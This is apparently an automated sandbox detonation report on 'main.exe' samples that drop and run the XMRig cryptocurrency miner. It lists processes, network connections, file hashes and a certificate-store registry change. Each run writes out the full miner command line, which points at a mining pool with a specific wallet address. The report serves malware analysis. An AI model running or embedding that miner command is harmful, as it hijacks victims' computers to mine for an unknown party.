memory/4424-39-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-40-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-41-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-42-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-43-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-44-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-45-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-46-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-47-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-48-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-49-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-50-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-51-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-52-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-53-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-54-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-55-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-56-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-57-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-58-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-59-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-60-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-61-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-62-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-63-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-64-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-65-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-66-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-67-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-68-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-69-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-70-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-71-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-72-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-73-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-74-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-75-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-76-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-77-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-78-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-79-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-80-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-81-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-82-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-83-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-84-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:10

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1216-16-0x000001BEAA930000-0x000001BEAA950000-memory.dmp

memory/1216-17-0x000001BEAABC0000-0x000001BEAABE0000-memory.dmp

memory/1216-18-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-21-0x000001BEAC390000-0x000001BEAC3B0000-memory.dmp

memory/1216-20-0x000001BEAC3B0000-0x000001BEAC3D0000-memory.dmp

memory/1216-19-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-22-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-23-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-24-0x000001BEAC3B0000-0x000001BEAC3D0000-memory.dmp

memory/1216-25-0x000001BEAC390000-0x000001BEAC3B0000-memory.dmp

memory/1216-26-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-27-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-28-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-29-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-30-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-31-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-32-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-33-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-34-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-35-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-36-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-37-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-38-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-39-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-40-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-41-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-42-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-43-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-44-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-45-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-46-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-47-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-48-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-49-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-50-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-51-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-52-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-53-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-54-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-55-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-56-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-57-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-58-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-59-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-60-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-61-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-62-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-63-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-64-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-65-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-66-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-67-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-68-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-69-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-70-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-71-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-72-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-73-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-74-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-75-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-76-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-77-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-78-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-79-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-80-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-81-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-82-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-83-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

memory/1216-84-0x00007FF7B0D60000-0x00007FF7B1863000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:11

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1789s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1516 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 1516 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 161.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
NL 23.62.61.161:443 www.bing.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.167.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3388-16-0x00000251B34A0000-0x00000251B34C0000-memory.dmp

memory/3388-17-0x00000251B34F0000-0x00000251B3510000-memory.dmp

memory/3388-18-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-19-0x00000251B4DE0000-0x00000251B4E00000-memory.dmp

memory/3388-20-0x00000251B3510000-0x00000251B3530000-memory.dmp

memory/3388-21-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-22-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-25-0x00000251B3510000-0x00000251B3530000-memory.dmp

memory/3388-24-0x00000251B4DE0000-0x00000251B4E00000-memory.dmp

memory/3388-23-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-26-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-27-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-28-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-29-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-30-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-31-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-32-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-33-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-34-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-35-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-36-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-37-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-38-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-39-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-40-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-41-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-42-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-43-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-44-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-45-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-46-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-47-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-48-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-49-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-50-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-51-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-52-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-53-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-54-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-55-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-56-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-57-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-58-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-59-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-60-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-61-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-62-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-63-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-64-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-65-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-66-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-67-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-68-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-69-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-70-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-71-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-72-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-73-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-74-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-75-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-76-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-77-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-78-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-79-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-80-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-81-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-82-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-83-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

memory/3388-84-0x00007FF73D160000-0x00007FF73DC63000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:51

Platform

win10v2004-20240426-en

Max time kernel

1792s

Max time network

1810s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6